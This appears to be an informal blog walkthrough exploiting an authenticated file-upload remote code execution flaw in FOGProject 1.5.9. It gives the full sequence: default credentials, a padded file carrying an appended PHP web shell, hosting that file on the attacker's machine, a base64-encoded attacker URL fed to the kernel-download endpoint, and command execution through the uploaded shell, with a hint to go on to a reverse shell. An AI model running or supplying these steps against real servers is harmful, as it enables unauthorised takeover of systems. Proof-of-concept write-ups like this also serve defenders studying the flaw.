Hello Guys so i will be talking about the new FOGProject 1.5.9 - File Upload RCE (Authenticated) which was disclose not to long so i will be exploiting one for a Proof Of Concept.
ExploitDB Link:- https://www.exploit-db.com/exploits/49811
We are having the victim machine ready now let log in with FogProject default credentials which is fog and password and we should have access to the dashboard.
Not time for the fun part going to attacking machine let create an empty 10mb file.
dd if=/dev/zero of=myshell bs=10485760 count=1
Now let add our PHP payload to the end of the file we just created.
echo '<?php $cmd=$_GET["cmd"]; system($cmd); ?>' >> myshell
Now we need to allow our myshell file to be accessible through HTTP i will using SimpleHTTPServer for that or you can easily copy the myshell to your /var/www/html .
It on the same folder i have the myshell now let encode the URL to get myshell file to base64 (Replacing Attacker IP) that is my IP because of the myshell file we are hosting on my machine.
echo "http://Attacker-IP/myshell" | base64
Now let visit the URL.
http://localhostfog//fog/management/index.php?node=about&sub=kernel&file=aHR0cDovLzEwLjguMC4xNTYvbXlzaGVsbAo=&arch=arm64 NOTE:- we add the myshell that we encoded in the base64 aHR0cDovLzEwLjguMC4xNTYvbXlzaGVsbAo= .
http://VICTIM_IP/fog/management/index.php?node=about&sub=kernel&file=<MYSHELL_URL_ENCODED_IN_BASE64_HERE>=&arch=arm64 .
Now change the Kernel Name (bzImage32) to myshell.php and click on Install we should get Download Started give it time and we should see Transfer Succeeded .
Nice our file have been uploaded we can confirm it by checking the SimpleHTTPServer we started.
Now let access our upload file through URL to get Remote Code Execution.
http://localhostfog/fog/service/ipxe/myshell.php?cmd=id
Boom and we have remote code execution you can go ahead and get a reverse shell or do anything.
Greeting From Muzec